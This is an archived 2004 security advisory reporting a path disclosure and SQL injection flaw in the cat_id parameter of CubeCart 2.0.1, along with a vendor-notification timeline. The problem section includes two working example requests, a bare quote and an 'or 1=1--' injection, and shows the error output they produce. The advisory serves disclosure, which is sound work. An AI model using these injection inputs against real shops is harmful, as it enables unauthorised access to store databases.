Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: e-commerce, shopping carts :: hack1172.htm

CubeCart 2.0.1 Full path disclosure and sql injection



Full path disclosure and sql injection on CubeCart 2.0.1



--------------------------------------------------------

Full path disclosure and sql injection on CubeCart 2.0.1

--------------------------------------------------------



[1]Introduction

[2]The Problem

[3]The Solution

[4]Timeline

[5]Feddback



##############################################################



[1]Introduction



"CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you can setup a powerful online store as long as you 



have hosting supporting PHP and one MySQL database."



This info was taken from http://www.cubecart.com 



CubeCart, from Brooky (http://www.brooky.com), is a software formerly known as eStore.





[2]The Problem



A remote user can cause an error in index.php using the parameter 'cat_id' which is not properly validated, displaying the 



software's full installation path. It can also be used to inject sql commands. Examples follow:



(a)	http://example.com/store/index.php?cat_id=' 



	causes an error like this:

		

	"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in 				



	/home/example/public_html/store/link_navi.php on line 35



	Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in 					



	/home/example/public_html/store/index.php on line 170



	Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in 				



	/home/example/public_html/store/index.php on line 172"





(b)	http://example.com/store/index.php?cat_id=1 or 1=1-- 



	displays all categories in the database





[3]The Solution



None at this time. Vendor contacted and fix will be avaliable soon.





[4]Timeline



(2/10/2004) Vulnerability discovered

(2/10/2004) Vendor notified

(3/10/2004) Vendor response





[5]Feedback



Comments and stuff to cybercide@megamail.pt 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH